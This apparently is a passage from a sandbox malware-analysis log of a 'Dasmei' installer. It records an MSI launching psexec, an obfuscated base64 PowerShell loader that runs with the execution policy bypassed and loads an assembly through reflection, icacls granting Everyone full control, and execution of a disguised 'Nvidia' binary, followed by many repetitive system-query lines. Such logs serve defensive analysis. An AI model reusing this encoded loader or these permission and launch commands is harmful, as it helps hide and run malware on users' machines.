    Source: C:\Windows\Installer\MSI2EE6.tmpProcess created: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe "C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe" "C:\Program Files (x86)\Dasmei support\App Dasmei installer\1e.ps1"Jump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-59226 /grant Everyone:F /T /CJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-59226\Nvidia-59226.exe /grant Everyone:F /T /CJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Nvidia-59226\Nvidia-59226.exe "C:\Nvidia-59226\Nvidia-59226.exe" Jump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand jab4ad0ajwazadeaoqazadiangbiadyalqbjadqangbiac0anaa1adaanwatadganabkadialqa5adgamgazaduaoqazaguamga1agyanaanadsajab5ad0ajwbdadoaxabqahiabwbnahiayqbtacaargbpagwazqbzacaakab4adgangapafwarabhahmabqblagkaiabzahuacabwag8acgb0afwaqqbwahaaiabeageacwbtaguaaqagacaaaqbuahmadabhagwabablahiaxabwahmazqb4aguaywauaguaeablaccaowb0ahiaeqagahsadqakacaaiabpagyaiaaoafsarqbuahyaaqbyag8abgbtaguabgb0af0aoga6afyazqbyahmaaqbvag4algbnageaagbvahiaiaatagcazqagadqakqanaaoaiaagahsaiaakag4adqbsagwaiaa9acaawwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6afuabgbzageazgblaewabwbhagqargbyag8abqaoacqaeqapacaafqagaguababzaguaiab7acaajabuahuababsacaapqagafsaugblagyabablagmadabpag8abgauaeeacwbzaguabqbiagwaeqbdadoaogbmag8ayqbkaeyaaqbsaguakaakahkakqb9aa0acgagacaalgagacgawwbfadmamgauaf8aoaa4af0aoga6af8anwa0acgajab4ackakqanaaoaiaagaguaeabpahqaiaakaewaqqbtafqarqbyaekavabdae8arabfaa0acgb9acaadqakagmayqb0agmaaaagafsatgbvahqauwb1ahaacabvahiadablagqarqb4agmazqbwahqaaqbvag4axqanaaoaewanaaoaiaagafcacgbpahqazqataegabwbzahqaiaanaeeacabwagwaaqbjageadabpag8abgagagwabwbjageadabpag8abgagagkacwagahuabgb0ahiadqbzahqazqbkac4aiabdag8acab5acaazgbpagwazqagahqabwagageaiabsag8aywbhagwaiabkahiaaqb2agualaagageabgbkacaadabyahkaiabhagcayqbpag4alganacaalqbgag8acgblagcacgbvahuabgbkaemabwbsag8acgagafiazqbkaa0acgb9aa0acgbjageadabjaggaiab7aa0acgagacaavwbyagkadablac0asabvahmadaagacgaigbfahiacgbvahiaogagaciaiaaracaajabfac4arqb4agmazqbwahqaaqbvag4algbnaguacwbzageazwblackaiaataeyabwbyaguaiabsaguazaagaa0acgb9aa==
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand jab4ad0ajwazadeaoqazadiangbiadyalqbjadqangbiac0anaa1adaanwatadganabkadialqa5adgamgazaduaoqazaguamga1agyanaanadsajab5ad0ajwbdadoaxabqahiabwbnahiayqbtacaargbpagwazqbzacaakab4adgangapafwarabhahmabqblagkaiabzahuacabwag8acgb0afwaqqbwahaaiabeageacwbtaguaaqagacaaaqbuahmadabhagwabablahiaxabwahmazqb4aguaywauaguaeablaccaowb0ahiaeqagahsadqakacaaiabpagyaiaaoafsarqbuahyaaqbyag8abgbtaguabgb0af0aoga6afyazqbyahmaaqbvag4algbnageaagbvahiaiaatagcazqagadqakqanaaoaiaagahsaiaakag4adqbsagwaiaa9acaawwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6afuabgbzageazgblaewabwbhagqargbyag8abqaoacqaeqapacaafqagaguababzaguaiab7acaajabuahuababsacaapqagafsaugblagyabablagmadabpag8abgauaeeacwbzaguabqbiagwaeqbdadoaogbmag8ayqbkaeyaaqbsaguakaakahkakqb9aa0acgagacaalgagacgawwbfadmamgauaf8aoaa4af0aoga6af8anwa0acgajab4ackakqanaaoaiaagaguaeabpahqaiaakaewaqqbtafqarqbyaekavabdae8arabfaa0acgb9acaadqakagmayqb0agmaaaagafsatgbvahqauwb1ahaacabvahiadablagqarqb4agmazqbwahqaaqbvag4axqanaaoaewanaaoaiaagafcacgbpahqazqataegabwbzahqaiaanaeeacabwagwaaqbjageadabpag8abgagagwabwbjageadabpag8abgagagkacwagahuabgb0ahiadqbzahqazqbkac4aiabdag8acab5acaazgbpagwazqagahqabwagageaiabsag8aywbhagwaiabkahiaaqb2agualaagageabgbkacaadabyahkaiabhagcayqbpag4alganacaalqbgag8acgblagcacgbvahuabgbkaemabwbsag8acgagafiazqbkaa0acgb9aa0acgbjageadabjaggaiab7aa0acgagacaavwbyagkadablac0asabvahmadaagacgaigbfahiacgbvahiaogagaciaiaaracaajabfac4arqb4agmazqbwahqaaqbvag4algbnaguacwbzageazwblackaiaataeyabwbyaguaiabsaguazaagaa0acgb9aa==Jump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AF9D5C cpuid 4_2_00AF9D5C
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: GetLocaleInfoW,4_2_00B14080
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: GetLocaleInfoEx,4_2_00AF9007
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00B141A9
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: EnumSystemLocalesW,4_2_00B0E19D
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: GetLocaleInfoW,4_2_00B142AF
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00B1437E
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: GetLocaleInfoEx,FormatMessageA,4_2_00AE27C1
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: GetLocaleInfoW,4_2_00B0E71A
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: GetACP,IsValidCodePage,GetLocaleInfoW,4_2_00B139FF
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: EnumSystemLocalesW,4_2_00B13CA7
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: EnumSystemLocalesW,4_2_00B13CF2
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: EnumSystemLocalesW,4_2_00B13D8D
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00B13E20
    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeQueries volume information: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetSecurity\Microsoft.Windows.Firewall.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
